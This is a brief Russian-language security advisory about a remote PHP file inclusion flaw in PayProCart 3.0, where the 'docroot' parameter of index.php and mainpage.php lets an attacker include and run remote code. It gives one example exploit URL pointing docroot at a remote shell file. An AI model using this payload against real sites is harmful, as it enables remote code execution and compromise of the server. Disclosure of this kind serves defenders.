PHP инклюдинг в PayProCart

Дата публикации:
12.09.2006
Дата изменения:
17.10.2006
Всего просмотров:
954
Опасность:
Высокая
Наличие исправления:
Нет
Количество уязвимостей:
1
CVSSv2 рейтинг:
CVE ID:
Нет данных
Вектор эксплуатации:
Удаленная
Воздействие:
Компрометация системы
CWE ID:
Нет данных
Наличие эксплоита:
Нет данных
Уязвимые продукты:
PayProCart 3.x
Уязвимые версии: PayProCart 3.0 v1146078425

Описание: Обнаруженная уязвимость позволяет злоумышленнику скомпрометировать уязвимую систему.

Сценарии index.php и mainpage.php не достаточно проверяют данные в параметре "docroot" перед включением файлов. В результате можно выполнить произвольный php код, включая файлы из локальных или удаленных источников.

Пример/Эксплоит: http://[url]/index.php?docroot=http://shell.txt?

Решение:Способов устранения обнаруженной уязвимости не существует в настоящее время.


или введите имя

CAPTCHA